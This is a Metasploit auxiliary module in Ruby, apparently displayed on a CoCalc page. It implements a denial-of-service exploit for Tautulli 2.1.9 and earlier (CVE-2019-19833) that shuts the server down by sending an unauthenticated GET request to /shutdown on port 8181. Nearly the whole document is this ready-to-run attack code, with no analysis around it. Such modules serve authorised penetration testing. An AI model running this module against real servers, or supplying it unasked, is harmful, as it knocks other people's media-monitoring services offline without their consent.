CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Remote::HttpClient
8

9
  def initialize
10
    super(
11
      'Name' => 'Tautulli v2.1.9 - Shutdown Denial of Service',
12
      'Description' => 'Tautulli versions 2.1.9 and prior are vulnerable to denial of service via the /shutdown URL.',
13
      'Author' => 'Ismail Tasdelen',
14
      'License' => MSF_LICENSE,
15
      'References' => [
16
        ['CVE', '2019-19833'],
17
        ['EDB', '47785']
18
      ]
19
    )
20
    register_options([ Opt::RPORT(8181) ])
21
  end
22

23
  def run
24
    res = send_request_raw({
25
      'method' => 'GET',
26
      'uri' => '/shutdown'
27
    })
28

29
    if res
30
      print_status("Request sent to #{rhost}")
31
    else
32
      print_status("No reply from #{rhost}")
33
    end
34
  rescue Errno::ECONNRESET
35
    print_status('Connection reset')
36
  end
37
end
38

39